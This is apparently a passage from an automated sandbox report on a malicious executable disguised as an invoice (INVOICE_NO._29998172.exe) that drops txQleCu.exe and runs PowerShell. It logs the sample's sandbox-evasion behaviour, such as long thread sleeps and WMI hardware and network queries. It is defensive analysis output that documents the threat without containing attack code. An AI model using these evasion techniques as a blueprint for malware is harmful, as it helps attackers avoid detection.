                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 6880Thread sleep time: -41202s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 6948Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6044Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 6052Thread sleep time: -41202s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 6004Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 1920Thread sleep count: 1858 > 30
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99858s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99732s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99624s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99515s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99384s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99265s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99156s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -99040s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -98921s >= -30000s
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exe TID: 3212Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -100000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 6096Thread sleep count: 1509 > 30
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99842s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99713s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99609s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99500s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99391s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99277s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -99172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\txQleCu.exe TID: 3236Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9070
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWindow / User API: threadDelayed 1858
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWindow / User API: threadDelayed 1509
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 41202
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 41202
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 100000
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeThread delayed: delay time: 99858
